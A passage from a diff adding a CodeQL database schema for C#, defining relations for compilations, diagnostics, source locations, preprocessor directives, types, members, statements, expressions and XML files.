invocation. + * If `id` is for the compiler invocation + * + * csc f1.cs f2.cs f3.cs + * + * then there will be rows for + * + * num | arg + * --- | --- + * 0 | f1.cs + * 1 | f2.cs + * 2 | f3.cs + */ +#keyset[id, num] +compilation_compiling_files( + int id : @compilation ref, + int num : int ref, + int file : @file ref +); + +/** + * The references used by a compiler invocation. + * If `id` is for the compiler invocation + * + * csc f1.cs f2.cs f3.cs /r:ref1.dll /r:ref2.dll /r:ref3.dll + * + * then there will be rows for + * + * num | arg + * --- | --- + * 0 | ref1.dll + * 1 | ref2.dll + * 2 | ref3.dll + */ +#keyset[id, num] +compilation_referencing_files( + int id : @compilation ref, + int num : int ref, + int file : @file ref +); + +/** + * The time taken by the extractor for a compiler invocation. + * + * For each file `num`, there will be rows for + * + * kind | seconds + * ---- | --- + * 1 | CPU seconds used by the extractor frontend + * 2 | Elapsed seconds during the extractor frontend + * 3 | CPU seconds used by the extractor backend + * 4 | Elapsed seconds during the extractor backend + */ +#keyset[id, num, kind] +compilation_time( + int id : @compilation ref, + int num : int ref, + /* kind: + 1 = frontend_cpu_seconds + 2 = frontend_elapsed_seconds + 3 = extractor_cpu_seconds + 4 = extractor_elapsed_seconds + */ + int kind : int ref, + float seconds : float ref +); + +/** + * An error or warning generated by the extractor. + * The diagnostic message `diagnostic` was generated during compiler + * invocation `compilation`, and is the `file_number_diagnostic_number`th + * message generated while extracting the `file_number`th file of that + * invocation. + */ +#keyset[compilation, file_number, file_number_diagnostic_number] +diagnostic_for( + unique int diagnostic : @diagnostic ref, + int compilation : @compilation ref, + int file_number : int ref, + int file_number_diagnostic_number : int ref +); + +diagnostics( + unique int id: @diagnostic, + int severity: int ref, + string error_tag: string ref, + string error_message: string ref, + string full_error_message: string ref, + int location: @location_default ref +); + +extractor_messages( + unique int id: @extractor_message, + int severity: int ref, + string origin : string ref, + string text : string ref, + string entity : string ref, + int location: @location_default ref, + string stack_trace : string ref +); + +/** + * If extraction was successful, then `cpu_seconds` and + * `elapsed_seconds` are the CPU time and elapsed time (respectively) + * that extraction took for compiler invocation `id`. + */ +compilation_finished( + unique int id : @compilation ref, + float cpu_seconds : float ref, + float elapsed_seconds : float ref +); + +compilation_assembly( + unique int id : @compilation ref, + int assembly: @assembly ref +) + +// Populated by the CSV extractor +externalData( + int id: @externalDataElement, + string path: string ref, + int column: int ref, + string value: string ref); + +sourceLocationPrefix( + string prefix: string ref); + +/* + * C# dbscheme + */ + +/** ELEMENTS **/ + +@element = @declaration | @stmt | @expr | @modifier | @attribute | @namespace_declaration + | @using_directive | @type_parameter_constraints | @externalDataElement + | @xmllocatable | @asp_element | @namespace | @preprocessor_directive; + +@declaration = @callable | @generic | @assignable | @namespace; + +@named_element = @namespace | @declaration; + +@declaration_with_accessors = @property | @indexer | @event; + +@assignable = @variable | @assignable_with_accessors | @event; + +@assignable_with_accessors = @property | @indexer; + +@attributable = @assembly | @field | @parameter | @operator | @method | @constructor + | @destructor | @callable_accessor | @value_or_ref_type | @declaration_with_accessors + | @local_function | @lambda_expr; + +/** LOCATIONS, ASEMMBLIES, MODULES, FILES and FOLDERS **/ + +@location = @location_default | @assembly; + +locations_default( + unique int id: @location_default, + int file: @file ref, + int beginLine: int ref, + int beginColumn: int ref, + int endLine: int ref, + int endColumn: int ref); + +locations_mapped( + unique int id: @location_default ref, + int mapped_to: @location_default ref); + +@sourceline = @file | @callable | @xmllocatable; + +numlines( + int element_id: @sourceline ref, + int num_lines: int ref, + int num_code: int ref, + int num_comment: int ref); + +assemblies( + unique int id: @assembly, + int file: @file ref, + string fullname: string ref, + string name: string ref, + string version: string ref); + +files( + unique int id: @file, + string name: string ref); + +folders( + unique int id: @folder, + string name: string ref); + +@container = @folder | @file ; + +containerparent( + int parent: @container ref, + unique int child: @container ref); + +file_extraction_mode( + unique int file: @file ref, + int mode: int ref + /* 0 = normal, 1 = standalone extractor */ + ); + +/** NAMESPACES **/ + +@type_container = @namespace | @type; + +namespaces( + unique int id: @namespace, + string name: string ref); + +namespace_declarations( + unique int id: @namespace_declaration, + int namespace_id: @namespace ref); + +namespace_declaration_location( + unique int id: @namespace_declaration ref, + int loc: @location ref); + +parent_namespace( + unique int child_id: @type_container ref, + int namespace_id: @namespace ref); + +@declaration_or_directive = @namespace_declaration | @type | @using_directive; + +parent_namespace_declaration( + int child_id: @declaration_or_directive ref, // cannot be unique because of partial classes + int namespace_id: @namespace_declaration ref); + +@using_directive = @using_namespace_directive | @using_static_directive; + +using_global( + unique int id: @using_directive ref +); + +using_namespace_directives( + unique int id: @using_namespace_directive, + int namespace_id: @namespace ref); + +using_static_directives( + unique int id: @using_static_directive, + int type_id: @type_or_ref ref); + +using_directive_location( + unique int id: @using_directive ref, + int loc: @location ref); + +@preprocessor_directive = @pragma_warning | @pragma_checksum | @directive_define | @directive_undefine | @directive_warning + | @directive_error | @directive_nullable | @directive_line | @directive_region | @directive_endregion | @directive_if + | @directive_elif | @directive_else | @directive_endif; + +@conditional_directive = @directive_if | @directive_elif; +@branch_directive = @directive_if | @directive_elif | @directive_else; + +directive_ifs( + unique int id: @directive_if, + int branchTaken: int ref, /* 0: false, 1: true */ + int conditionValue: int ref); /* 0: false, 1: true */ + +directive_elifs( + unique int id: @directive_elif, + int branchTaken: int ref, /* 0: false, 1: true */ + int conditionValue: int ref, /* 0: false, 1: true */ + int parent: @directive_if ref, + int index: int ref); + +directive_elses( + unique int id: @directive_else, + int branchTaken: int ref, /* 0: false, 1: true */ + int parent: @directive_if ref, + int index: int ref); + +#keyset[id, start] +directive_endifs( + unique int id: @directive_endif, + unique int start: @directive_if ref); + +directive_define_symbols( + unique int id: @define_symbol_expr ref, + string name: string ref); + +directive_regions( + unique int id: @directive_region, + string name: string ref); + +#keyset[id, start] +directive_endregions( + unique int id: @directive_endregion, + unique int start: @directive_region ref); + +directive_lines( + unique int id: @directive_line, + int kind: int ref); /* 0: default, 1: hidden, 2: numeric, 3: span */ + +directive_line_value( + unique int id: @directive_line ref, + int line: int ref); + +directive_line_file( + unique int id: @directive_line ref, + int file: @file ref); + +directive_line_offset( + unique int id: @directive_line ref, + int offset: int ref); + +directive_line_span( + unique int id: @directive_line ref, + int startLine: int ref, + int startColumn: int ref, + int endLine: int ref, + int endColumn: int ref); + +directive_nullables( + unique int id: @directive_nullable, + int setting: int ref, /* 0: disable, 1: enable, 2: restore */ + int target: int ref); /* 0: none, 1: annotations, 2: warnings */ + +directive_warnings( + unique int id: @directive_warning, + string message: string ref); + +directive_errors( + unique int id: @directive_error, + string message: string ref); + +directive_undefines( + unique int id: @directive_undefine, + string name: string ref); + +directive_defines( + unique int id: @directive_define, + string name: string ref); + +pragma_checksums( + unique int id: @pragma_checksum, + int file: @file ref, + string guid: string ref, + string bytes: string ref); + +pragma_warnings( + unique int id: @pragma_warning, + int kind: int ref /* 0 = disable, 1 = restore */); + +#keyset[id, index] +pragma_warning_error_codes( + int id: @pragma_warning ref, + string errorCode: string ref, + int index: int ref); + +preprocessor_directive_location( + unique int id: @preprocessor_directive ref, + int loc: @location ref); + +preprocessor_directive_compilation( + unique int id: @preprocessor_directive ref, + int compilation: @compilation ref); + +preprocessor_directive_active( + unique int id: @preprocessor_directive ref, + int active: int ref); /* 0: false, 1: true */ + +/** TYPES **/ + +types( + unique int id: @type, + int kind: int ref, + string name: string ref); + +case @type.kind of + 1 = @bool_type +| 2 = @char_type +| 3 = @decimal_type +| 4 = @sbyte_type +| 5 = @short_type +| 6 = @int_type +| 7 = @long_type +| 8 = @byte_type +| 9 = @ushort_type +| 10 = @uint_type +| 11 = @ulong_type +| 12 = @float_type +| 13 = @double_type +| 14 = @enum_type +| 15 = @struct_type +| 17 = @class_type +| 19 = @interface_type +| 20 = @delegate_type +| 21 = @null_type +| 22 = @type_parameter +| 23 = @pointer_type +| 24 = @nullable_type +| 25 = @array_type +| 26 = @void_type +| 27 = @int_ptr_type +| 28 = @uint_ptr_type +| 29 = @dynamic_type +| 30 = @arglist_type +| 31 = @unknown_type +| 32 = @tuple_type +| 33 = @function_pointer_type + ; + +@simple_type = @bool_type | @char_type | @integral_type | @floating_point_type | @decimal_type; +@integral_type = @signed_integral_type | @unsigned_integral_type; +@signed_integral_type = @sbyte_type | @short_type | @int_type | @long_type; +@unsigned_integral_type = @byte_type | @ushort_type | @uint_type | @ulong_type; +@floating_point_type = @float_type | @double_type; +@value_type = @simple_type | @enum_type | @struct_type | @nullable_type | @int_ptr_type + | @uint_ptr_type | @tuple_type; +@ref_type = @class_type | @interface_type | @array_type | @delegate_type | @null_type + | @dynamic_type; +@value_or_ref_type = @value_type | @ref_type; + +typerefs( + unique int id: @typeref, + string name: string ref); + +typeref_type( + int id: @typeref ref, + unique int typeId: @type ref); + +@type_or_ref = @type | @typeref; + +array_element_type( + unique int array: @array_type ref, + int dimension: int ref, + int rank: int ref, + int element: @type_or_ref ref); + +nullable_underlying_type( + unique int nullable: @nullable_type ref, + int underlying: @type_or_ref ref); + +pointer_referent_type( + unique int pointer: @pointer_type ref, + int referent: @type_or_ref ref); + +enum_underlying_type( + unique int enum_id: @enum_type ref, + int underlying_type_id: @type_or_ref ref); + +delegate_return_type( + unique int delegate_id: @delegate_type ref, + int return_type_id: @type_or_ref ref); + +function_pointer_return_type( + unique int function_pointer_id: @function_pointer_type ref, + int return_type_id: @type_or_ref ref); + +extend( + int sub: @type ref, + int super: @type_or_ref ref); + +anonymous_types( + unique int id: @type ref); + +@interface_or_ref = @interface_type | @typeref; + +implement( + int sub: @type ref, + int super: @type_or_ref ref); + +type_location( + int id: @type ref, + int loc: @location ref); + +tuple_underlying_type( + unique int tuple: @tuple_type ref, + int struct: @type_or_ref ref); + +#keyset[tuple, index] +tuple_element( + int tuple: @tuple_type ref, + int index: int ref, + unique int field: @field ref); + +attributes( + unique int id: @attribute, + int kind: int ref, + int type_id: @type_or_ref ref, + int target: @attributable ref); + +case @attribute.kind of + 0 = @attribute_default +| 1 = @attribute_return +| 2 = @attribute_assembly +| 3 = @attribute_module +; + +attribute_location( + int id: @attribute ref, + int loc: @location ref); + +@type_mention_parent = @element | @type_mention; + +type_mention( + unique int id: @type_mention, + int type_id: @type_or_ref ref, + int parent: @type_mention_parent ref); + +type_mention_location( + unique int id: @type_mention ref, + int loc: @location ref); + +@has_type_annotation = @assignable | @type_parameter | @callable | @expr | @delegate_type | @generic | @function_pointer_type; + +/** + * A direct annotation on an entity, for example `string? x;`. + * + * Annotations: + * 2 = reftype is not annotated "!" + * 3 = reftype is annotated "?" + * 4 = readonly ref type / in parameter + * 5 = ref type parameter, return or local variable + * 6 = out parameter + * + * Note that the annotation depends on the element it annotates. + * @assignable: The annotation is on the type of the assignable, for example the variable type. + * @type_parameter: The annotation is on the reftype constraint + * @callable: The annotation is on the return type + * @array_type: The annotation is on the element type + */ +type_annotation(int id: @has_type_annotation ref, int annotation: int ref); + +nullability(unique int nullability: @nullability, int kind: int ref); + +case @nullability.kind of + 0 = @oblivious +| 1 = @not_annotated +| 2 = @annotated +; + +#keyset[parent, index] +nullability_parent(int nullability: @nullability ref, int index: int ref, int parent: @nullability ref) + +type_nullability(int id: @has_type_annotation ref, int nullability: @nullability ref); + +/** + * The nullable flow state of an expression, as determined by Roslyn. + * 0 = none (default, not populated) + * 1 = not null + * 2 = maybe null + */ +expr_flowstate(unique int id: @expr ref, int state: int ref); + +/** GENERICS **/ + +@generic = @type | @method | @local_function; + +type_parameters( + unique int id: @type_parameter ref, + int index: int ref, + int generic_id: @generic ref, + int variance: int ref /* none = 0, out = 1, in = 2 */); + +#keyset[constructed_id, index] +type_arguments( + int id: @type_or_ref ref, + int index: int ref, + int constructed_id: @generic_or_ref ref); + +@generic_or_ref = @generic | @typeref; + +constructed_generic( + unique int constructed: @generic ref, + int generic: @generic_or_ref ref); + +type_parameter_constraints( + unique int id: @type_parameter_constraints, + int param_id: @type_parameter ref); + +type_parameter_constraints_location( + int id: @type_parameter_constraints ref, + int loc: @location ref); + +general_type_parameter_constraints( + int id: @type_parameter_constraints ref, + int kind: int ref /* class = 1, struct = 2, new = 3 */); + +specific_type_parameter_constraints( + int id: @type_parameter_constraints ref, + int base_id: @type_or_ref ref); + +specific_type_parameter_nullability( + int id: @type_parameter_constraints ref, + int base_id: @type_or_ref ref, + int nullability: @nullability ref); + +/** FUNCTION POINTERS */ + +function_pointer_calling_conventions( + int id: @function_pointer_type ref, + int kind: int ref); + +#keyset[id, index] +has_unmanaged_calling_conventions( + int id: @function_pointer_type ref, + int index: int ref, + int conv_id: @type_or_ref ref); + +/** MODIFIERS */ + +@modifiable = @modifiable_direct | @event_accessor; + +@modifiable_direct = @member | @accessor | @local_function | @anonymous_function_expr; + +modifiers( + unique int id: @modifier, + string name: string ref); + +has_modifiers( + int id: @modifiable_direct ref, + int mod_id: @modifier ref); + +compiler_generated(unique int id: @modifiable ref); + +/** MEMBERS **/ + +@member = @method | @constructor | @destructor | @field | @property | @event | @operator | @indexer | @type; + +@named_exprorstmt = @goto_stmt | @labeled_stmt | @expr; + +@virtualizable = @method | @property | @indexer | @event; + +exprorstmt_name( + unique int parent_id: @named_exprorstmt ref, + string name: string ref); + +nested_types( + unique int id: @type ref, + int declaring_type_id: @type ref, + int unbound_id: @type ref); + +properties( + unique int id: @property, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @property ref); + +property_location( + int id: @property ref, + int loc: @location ref); + +indexers( + unique int id: @indexer, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @indexer ref); + +indexer_location( + int id: @indexer ref, + int loc: @location ref); + +accessors( + unique int id: @accessor, + int kind: int ref, + string name: string ref, + int declaring_member_id: @member ref, + int unbound_id: @accessor ref); + +case @accessor.kind of + 1 = @getter +| 2 = @setter + ; + +init_only_accessors( + unique int id: @accessor ref); + +accessor_location( + int id: @accessor ref, + int loc: @location ref); + +events( + unique int id: @event, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @event ref); + +event_location( + int id: @event ref, + int loc: @location ref); + +event_accessors( + unique int id: @event_accessor, + int kind: int ref, + string name: string ref, + int declaring_event_id: @event ref, + int unbound_id: @event_accessor ref); + +case @event_accessor.kind of + 1 = @add_event_accessor +| 2 = @remove_event_accessor + ; + +event_accessor_location( + int id: @event_accessor ref, + int loc: @location ref); + +operators( + unique int id: @operator, + string name: string ref, + string symbol: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @operator ref); + +operator_location( + int id: @operator ref, + int loc: @location ref); + +constant_value( + int id: @variable ref, + string value: string ref); + +/** CALLABLES **/ + +@callable = @method | @constructor | @destructor | @operator | @callable_accessor | @anonymous_function_expr | @local_function; + +@callable_accessor = @accessor | @event_accessor; + +methods( + unique int id: @method, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @method ref); + +method_location( + int id: @method ref, + int loc: @location ref); + +constructors( + unique int id: @constructor, + string name: string ref, + int declaring_type_id: @type ref, + int unbound_id: @constructor ref); + +constructor_location( + int id: @constructor ref, + int loc: @location ref); + +destructors( + unique int id: @destructor, + string name: string ref, + int declaring_type_id: @type ref, + int unbound_id: @destructor ref); + +destructor_location( + int id: @destructor ref, + int loc: @location ref); + +overrides( + int id: @callable ref, + int base_id: @callable ref); + +explicitly_implements( + int id: @member ref, + int interface_id: @interface_or_ref ref); + +local_functions( + unique int id: @local_function, + string name: string ref, + int return_type: @type ref, + int unbound_id: @local_function ref); + +local_function_stmts( + unique int fn: @local_function_stmt ref, + int stmt: @local_function ref); + +/** VARIABLES **/ + +@variable = @local_scope_variable | @field; + +@local_scope_variable = @local_variable | @parameter; + +fields( + unique int id: @field, + int kind: int ref, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @field ref); + +case @field.kind of + 1 = @addressable_field +| 2 = @constant + ; + +field_location( + int id: @field ref, + int loc: @location ref); + +localvars( + unique int id: @local_variable, + int kind: int ref, + string name: string ref, + int implicitly_typed: int ref /* 0 = no, 1 = yes */, + int type_id: @type_or_ref ref, + int parent_id: @local_var_decl_expr ref); + +case @local_variable.kind of + 1 = @addressable_local_variable +| 2 = @local_constant +| 3 = @local_variable_ref + ; + +localvar_location( + unique int id: @local_variable ref, + int loc: @location ref); + +@parameterizable = @callable | @delegate_type | @indexer | @function_pointer_type; + +#keyset[name, parent_id] +#keyset[index, parent_id] +params( + unique int id: @parameter, + string name: string ref, + int type_id: @type_or_ref ref, + int index: int ref, + int mode: int ref, /* value = 0, ref = 1, out = 2, array = 3, this = 4 */ + int parent_id: @parameterizable ref, + int unbound_id: @parameter ref); + +param_location( + int id: @parameter ref, + int loc: @location ref); + +/** STATEMENTS **/ + +@exprorstmt_parent = @control_flow_element | @top_level_exprorstmt_parent; + +statements( + unique int id: @stmt, + int kind: int ref); + +#keyset[index, parent] +stmt_parent( + unique int stmt: @stmt ref, + int index: int ref, + int parent: @control_flow_element ref); + +@top_level_stmt_parent = @callable; + +// [index, parent] is not a keyset because the same parent may be compiled multiple times +stmt_parent_top_level( + unique int stmt: @stmt ref, + int index: int ref, + int parent: @top_level_stmt_parent ref); + +case @stmt.kind of + 1 = @block_stmt +| 2 = @expr_stmt +| 3 = @if_stmt +| 4 = @switch_stmt +| 5 = @while_stmt +| 6 = @do_stmt +| 7 = @for_stmt +| 8 = @foreach_stmt +| 9 = @break_stmt +| 10 = @continue_stmt +| 11 = @goto_stmt +| 12 = @goto_case_stmt +| 13 = @goto_default_stmt +| 14 = @throw_stmt +| 15 = @return_stmt +| 16 = @yield_stmt +| 17 = @try_stmt +| 18 = @checked_stmt +| 19 = @unchecked_stmt +| 20 = @lock_stmt +| 21 = @using_block_stmt +| 22 = @var_decl_stmt +| 23 = @const_decl_stmt +| 24 = @empty_stmt +| 25 = @unsafe_stmt +| 26 = @fixed_stmt +| 27 = @label_stmt +| 28 = @catch +| 29 = @case_stmt +| 30 = @local_function_stmt +| 31 = @using_decl_stmt + ; + +@using_stmt = @using_block_stmt | @using_decl_stmt; + +@labeled_stmt = @label_stmt | @case; + +@decl_stmt = @var_decl_stmt | @const_decl_stmt | @using_decl_stmt; + +@cond_stmt = @if_stmt | @switch_stmt; + +@loop_stmt = @while_stmt | @do_stmt | @for_stmt | @foreach_stmt; + +@jump_stmt = @break_stmt | @goto_any_stmt | @continue_stmt | @throw_stmt | @return_stmt + | @yield_stmt; + +@goto_any_stmt = @goto_default_stmt | @goto_case_stmt | @goto_stmt; + + +stmt_location( + unique int id: @stmt ref, + int loc: @location ref); + +catch_type( + unique int catch_id: @catch ref, + int type_id: @type_or_ref ref, + int kind: int ref /* explicit = 1, implicit = 2 */); + +foreach_stmt_info( + unique int id: @foreach_stmt ref, + int kind: int ref /* non-async = 1, async = 2 */); + +@foreach_symbol = @method | @property | @type_or_ref; + +#keyset[id, kind] +foreach_stmt_desugar( + int id: @foreach_stmt ref, + int symbol: @foreach_symbol ref, + int kind: int ref /* GetEnumeratorMethod = 1, CurrentProperty = 2, MoveNextMethod = 3, DisposeMethod = 4, ElementType = 5 */); + +/** EXPRESSIONS **/ + +expressions( + unique int id: @expr, + int kind: int ref, + int type_id: @type_or_ref ref); + +#keyset[index, parent] +expr_parent( + unique int expr: @expr ref, + int index: int ref, + int parent: @control_flow_element ref); + +@top_level_expr_parent = @attribute | @field | @property | @indexer | @parameter | @directive_if | @directive_elif; + +@top_level_exprorstmt_parent = @top_level_expr_parent | @top_level_stmt_parent; + +// [index, parent] is not a keyset because the same parent may be compiled multiple times +expr_parent_top_level( + unique int expr: @expr ref, + int index: int ref, + int parent: @top_level_exprorstmt_parent ref); + +case @expr.kind of +/* literal */ + 1 = @bool_literal_expr +| 2 = @char_literal_expr +| 3 = @decimal_literal_expr +| 4 = @int_literal_expr +| 5 = @long_literal_expr +| 6 = @uint_literal_expr +| 7 = @ulong_literal_expr +| 8 = @float_literal_expr +| 9 = @double_literal_expr +| 10 = @string_literal_expr +| 11 = @null_literal_expr +/* primary & unary */ +| 12 = @this_access_expr +| 13 = @base_access_expr +| 14 = @local_variable_access_expr +| 15 = @parameter_access_expr +| 16 = @field_access_expr +| 17 = @property_access_expr +| 18 = @method_access_expr +| 19 = @event_access_expr +| 20 = @indexer_access_expr +| 21 = @array_access_expr +| 22 = @type_access_expr +| 23 = @typeof_expr +| 24 = @method_invocation_expr +| 25 = @delegate_invocation_expr +| 26 = @operator_invocation_expr +| 27 = @cast_expr +| 28 = @object_creation_expr +| 29 = @explicit_delegate_creation_expr +| 30 = @implicit_delegate_creation_expr +| 31 = @array_creation_expr +| 32 = @default_expr +| 33 = @plus_expr +| 34 = @minus_expr +| 35 = @bit_not_expr +| 36 = @log_not_expr +| 37 = @post_incr_expr +| 38 = @post_decr_expr +| 39 = @pre_incr_expr +| 40 = @pre_decr_expr +/* multiplicative */ +| 41 = @mul_expr +| 42 = @div_expr +| 43 = @rem_expr +/* additive */ +| 44 = @add_expr +| 45 = @sub_expr +/* shift */ +| 46 = @lshift_expr +| 47 = @rshift_expr +/* relational */ +| 48 = @lt_expr +| 49 = @gt_expr +| 50 = @le_expr +| 51 = @ge_expr +/* equality */ +| 52 = @eq_expr +| 53 = @ne_expr +/* logical */ +| 54 = @bit_and_expr +| 55 = @bit_xor_expr +| 56 = @bit_or_expr +| 57 = @log_and_expr +| 58 = @log_or_expr +/* type testing */ +| 59 = @is_expr +| 60 = @as_expr +/* null coalescing */ +| 61 = @null_coalescing_expr +/* conditional */ +| 62 = @conditional_expr +/* assignment */ +| 63 = @simple_assign_expr +| 64 = @assign_add_expr +| 65 = @assign_sub_expr +| 66 = @assign_mul_expr +| 67 = @assign_div_expr +| 68 = @assign_rem_expr +| 69 = @assign_and_expr +| 70 = @assign_xor_expr +| 71 = @assign_or_expr +| 72 = @assign_lshift_expr +| 73 = @assign_rshift_expr +/* more */ +| 74 = @object_init_expr +| 75 = @collection_init_expr +| 76 = @array_init_expr +| 77 = @checked_expr +| 78 = @unchecked_expr +| 79 = @constructor_init_expr +| 80 = @add_event_expr +| 81 = @remove_event_expr +| 82 = @par_expr +| 83 = @local_var_decl_expr +| 84 = @lambda_expr +| 85 = @anonymous_method_expr +| 86 = @namespace_expr +/* dynamic */ +| 92 = @dynamic_element_access_expr +| 93 = @dynamic_member_access_expr +/* unsafe */ +| 100 = @pointer_indirection_expr +| 101 = @address_of_expr +| 102 = @sizeof_expr +/* async */ +| 103 = @await_expr +/* C# 6.0 */ +| 104 = @nameof_expr +| 105 = @interpolated_string_expr +| 106 = @unknown_expr +/* C# 7.0 */ +| 107 = @throw_expr +| 108 = @tuple_expr +| 109 = @local_function_invocation_expr +| 110 = @ref_expr +| 111 = @discard_expr +/* C# 8.0 */ +| 112 = @range_expr +| 113 = @index_expr +| 114 = @switch_expr +| 115 = @recursive_pattern_expr +| 116 = @property_pattern_expr +| 117 = @positional_pattern_expr +| 118 = @switch_case_expr +| 119 = @assign_coalesce_expr +| 120 = @suppress_nullable_warning_expr +| 121 = @namespace_access_expr +/* C# 9.0 */ +| 122 = @lt_pattern_expr +| 123 = @gt_pattern_expr +| 124 = @le_pattern_expr +| 125 = @ge_pattern_expr +| 126 = @not_pattern_expr +| 127 = @and_pattern_expr +| 128 = @or_pattern_expr +| 129 = @function_pointer_invocation_expr +| 130 = @with_expr +/* C# 11.0 */ +| 131 = @list_pattern_expr +| 132 = @slice_pattern_expr +| 133 = @urshift_expr +| 134 = @assign_urshift_expr +/* Preprocessor */ +| 999 = @define_symbol_expr +; + +@switch = @switch_stmt | @switch_expr; +@case = @case_stmt | @switch_case_expr; +@pattern_match = @case | @is_expr; +@unary_pattern_expr = @not_pattern_expr; +@relational_pattern_expr = @gt_pattern_expr | @lt_pattern_expr | @ge_pattern_expr | @le_pattern_expr; +@binary_pattern_expr = @and_pattern_expr | @or_pattern_expr; + +@integer_literal_expr = @int_literal_expr | @long_literal_expr | @uint_literal_expr | @ulong_literal_expr; +@real_literal_expr = @float_literal_expr | @double_literal_expr | @decimal_literal_expr; +@literal_expr = @bool_literal_expr | @char_literal_expr | @integer_literal_expr | @real_literal_expr + | @string_literal_expr | @null_literal_expr; + +@assign_expr = @simple_assign_expr | @assign_op_expr | @local_var_decl_expr; +@assign_op_expr = @assign_arith_expr | @assign_bitwise_expr | @assign_event_expr | @assign_coalesce_expr; +@assign_event_expr = @add_event_expr | @remove_event_expr; + +@assign_arith_expr = @assign_add_expr | @assign_sub_expr | @assign_mul_expr | @assign_div_expr + | @assign_rem_expr +@assign_bitwise_expr = @assign_and_expr | @assign_or_expr | @assign_xor_expr + | @assign_lshift_expr | @assign_rshift_expr | @assign_urshift_expr; + +@member_access_expr = @field_access_expr | @property_access_expr | @indexer_access_expr | @event_access_expr + | @method_access_expr | @type_access_expr | @dynamic_member_access_expr; +@access_expr = @member_access_expr | @this_access_expr | @base_access_expr | @assignable_access_expr | @namespace_access_expr; +@element_access_expr = @indexer_access_expr | @array_access_expr | @dynamic_element_access_expr; + +@local_variable_access = @local_variable_access_expr | @local_var_decl_expr; +@local_scope_variable_access_expr = @parameter_access_expr | @local_variable_access; +@variable_access_expr = @local_scope_variable_access_expr | @field_access_expr; + +@assignable_access_expr = @variable_access_expr | @property_access_expr | @element_access_expr + | @event_access_expr | @dynamic_member_access_expr; + +@objectorcollection_init_expr = @object_init_expr | @collection_init_expr; + +@delegate_creation_expr = @explicit_delegate_creation_expr | @implicit_delegate_creation_expr; + +@bin_arith_op_expr = @mul_expr | @div_expr | @rem_expr | @add_expr | @sub_expr; +@incr_op_expr = @pre_incr_expr | @post_incr_expr; +@decr_op_expr = @pre_decr_expr | @post_decr_expr; +@mut_op_expr = @incr_op_expr | @decr_op_expr; +@un_arith_op_expr = @plus_expr | @minus_expr | @mut_op_expr; +@arith_op_expr = @bin_arith_op_expr | @un_arith_op_expr; + +@ternary_log_op_expr = @conditional_expr; +@bin_log_op_expr = @log_and_expr | @log_or_expr | @null_coalescing_expr; +@un_log_op_expr = @log_not_expr; +@log_expr = @un_log_op_expr | @bin_log_op_expr | @ternary_log_op_expr; + +@bin_bit_op_expr = @bit_and_expr | @bit_or_expr | @bit_xor_expr | @lshift_expr + | @rshift_expr | @urshift_expr; +@un_bit_op_expr = @bit_not_expr; +@bit_expr = @un_bit_op_expr | @bin_bit_op_expr; + +@equality_op_expr = @eq_expr | @ne_expr; +@rel_op_expr = @gt_expr | @lt_expr| @ge_expr | @le_expr; +@comp_expr = @equality_op_expr | @rel_op_expr; + +@op_expr = @assign_expr | @un_op | @bin_op | @ternary_op; + +@ternary_op = @ternary_log_op_expr; +@bin_op = @bin_arith_op_expr | @bin_log_op_expr | @bin_bit_op_expr | @comp_expr; +@un_op = @un_arith_op_expr | @un_log_op_expr | @un_bit_op_expr | @sizeof_expr + | @pointer_indirection_expr | @address_of_expr; + +@anonymous_function_expr = @lambda_expr | @anonymous_method_expr; + +@call = @method_invocation_expr | @constructor_init_expr | @operator_invocation_expr + | @delegate_invocation_expr | @object_creation_expr | @call_access_expr + | @local_function_invocation_expr | @function_pointer_invocation_expr; + +@call_access_expr = @property_access_expr | @event_access_expr | @indexer_access_expr; + +@late_bindable_expr = @dynamic_element_access_expr | @dynamic_member_access_expr + | @object_creation_expr | @method_invocation_expr | @operator_invocation_expr; + +@throw_element = @throw_expr | @throw_stmt; + +@implicitly_typeable_object_creation_expr = @object_creation_expr | @explicit_delegate_creation_expr; + +implicitly_typed_array_creation( + unique int id: @array_creation_expr ref); + +explicitly_sized_array_creation( + unique int id: @array_creation_expr ref); + +stackalloc_array_creation( + unique int id: @array_creation_expr ref); + +implicitly_typed_object_creation( + unique int id: @implicitly_typeable_object_creation_expr ref); + +mutator_invocation_mode( + unique int id: @operator_invocation_expr ref, + int mode: int ref /* prefix = 1, postfix = 2*/); + +expr_compiler_generated( + unique int id: @expr ref); + +expr_value( + unique int id: @expr ref, + string value: string ref); + +expr_call( + unique int caller_id: @expr ref, + int target_id: @callable ref); + +expr_access( + unique int accesser_id: @access_expr ref, + int target_id: @accessible ref); + +@accessible = @method | @assignable | @local_function | @namespace; + +expr_location( + unique int id: @expr ref, + int loc: @location ref); + +dynamic_member_name( + unique int id: @late_bindable_expr ref, + string name: string ref); + +@qualifiable_expr = @member_access_expr + | @method_invocation_expr + | @element_access_expr; + +conditional_access( + unique int id: @qualifiable_expr ref); + +expr_argument( + unique int id: @expr ref, + int mode: int ref); + /* mode is the same as params: value = 0, ref = 1, out = 2 */ + +expr_argument_name( + unique int id: @expr ref, + string name: string ref); + +lambda_expr_return_type( + unique int id: @lambda_expr ref, + int type_id: @type_or_ref ref); + +/** CONTROL/DATA FLOW **/ + +@control_flow_element = @stmt | @expr; + +/* XML Files */ + +xmlEncoding ( + unique int id: @file ref, + string encoding: string ref); + +xmlDTDs( + unique int id: @xmldtd, + string root: string ref, + string publicId: string ref, + string systemId: string ref, + int fileid: @file ref); + +xmlElements( + unique int id: @xmlelement, + string name: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int fileid: @file ref); + +xmlAttrs( + unique int id: @xmlattribute, + int elementid: @xmlelement ref, + string name: string ref, + string value: string ref, + int idx: int ref, + int fileid: @file ref); + +xmlNs( + int id: @xmlnamespace, + string prefixName: string ref, + string URI: string ref, + int fileid: @file ref); + +xmlHasNs( + int elementId: @xmlnamespaceable ref, + int nsId: @xmlnamespace ref, + int fileid: @file ref); + +xmlComments( + unique int id: @xmlcomment, + string text: string ref, + int parentid: @xmlparent ref, + int fileid: @file ref); + +xmlChars( + unique int id: @xmlcharacters, + string text: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int isCDATA: int ref, + int fileid: @file ref); 